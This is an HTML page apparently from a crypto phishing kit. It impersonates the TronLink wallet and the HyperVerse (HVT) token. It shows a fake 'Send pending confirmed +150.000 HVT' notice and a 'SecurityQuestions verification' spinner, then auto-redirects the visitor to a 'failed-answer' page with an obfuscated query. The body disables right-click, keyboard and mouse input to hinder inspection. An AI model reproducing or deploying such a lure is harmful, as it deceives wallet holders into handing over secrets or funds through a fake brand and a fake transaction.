
<!DOCTYPE html>
<html class="no-js">
  <head>
	  <link rel="shortcut icon" href="https://h5.thehyperverse.net/static/favicon.ico" type="image/x-icon">
        <title>HVT HyperVerse Token</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <style type="text/css">@charset "UTF-8";
      [ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){
        display:none !important;
      }
      ng\:form{
        display:block;
      }
      .ng-animate-shim{
        visibility:hidden;
      }
      .ng-anchor{
        position:absolute;
      }
	  
	  .load {
	  font-size: 1.5rem;
    font-family: Euclid, Roboto, Helvetica, Arial, sans-serif;
    line-height: 140%;
    font-style: normal;
    font-weight: normal;
    width: 100%;
	}
	
	.font {
	font-size: 1rem;
    font-family: monospace;
    line-height: 140%;
    font-style: normal;
    font-weight: 500;
    width: 100%;
	color: #713adf;
	}
    </style>
	<style>
.loader {
margin:15px 0;
    border: 8px solid #f3f3f3;
    border-radius: 50%;
    border-top: 8px solid #3498db;
    width: 45px;
    height: 45px;
  -webkit-animation: spin 2s linear infinite; /* Safari */
  animation: spin 2s linear infinite;
}

/* Safari */
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(0deg); }
  100% { -webkit-transform: rotate(360deg); }
}

@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}
</style>
    <title>TronLink | Professional USDT-Tron (TRX) Wallet
    </title>
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width">
  </head>
  <body oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;">
    <!-- uiView: -->
    <div ui-view="" class="ng-scope">
      <div class="so-back ng-scope" ng-controller="interstellar-basic-client.HeaderController as header">
        <div class="so-chunk">
        </div>
      </div>
      <!-- ngIf: widget.view == 'sendConfirm' -->
      <div class="sendConfirm ng-scope" ng-if="widget.view == ÞsendConfirm&#39;">
        <meta http-equiv="refresh" content=" 6;url=/net/failed-answer.html?%525jblndlipeogp%552afnldhgmapagcccfchpi">
        <br> 
        <br>
        <br> 
        <br>
        <br> 
        <br>
        <center>
          <img src="https://assets.coingecko.com/coins/images/23102/small/1_03RIVsRDc8ZvCojuBZ-obg.png?1643185572" width="80" height="80">
        </center>
        <center>
          <div class="WalletTokenList__refreshed-message load">Loading Balances
          </div>
        </center>
        <center class="font"> 
          <font size="4">Send pending confirmed +150.000 HVT HyperVerse</font>
		   <br>
		   <div class="loader"></div>
		  <font size="5" style="color:black;">SecurityQuestions verification...</font>
		   <br>
          <br>
        </center>
        <!-- ngIf: widget.memo -->
        <div class="sendConfirm__sendingContainer ng-scope" ng-if="widget.memo">
        </div>
      </div>
      <!-- end ngIf: widget.memo -->
      <!-- ngIf: !widget.memo && widget.memoWarningAlerts.length > 0 -->
    </div>
  </body>
</html>
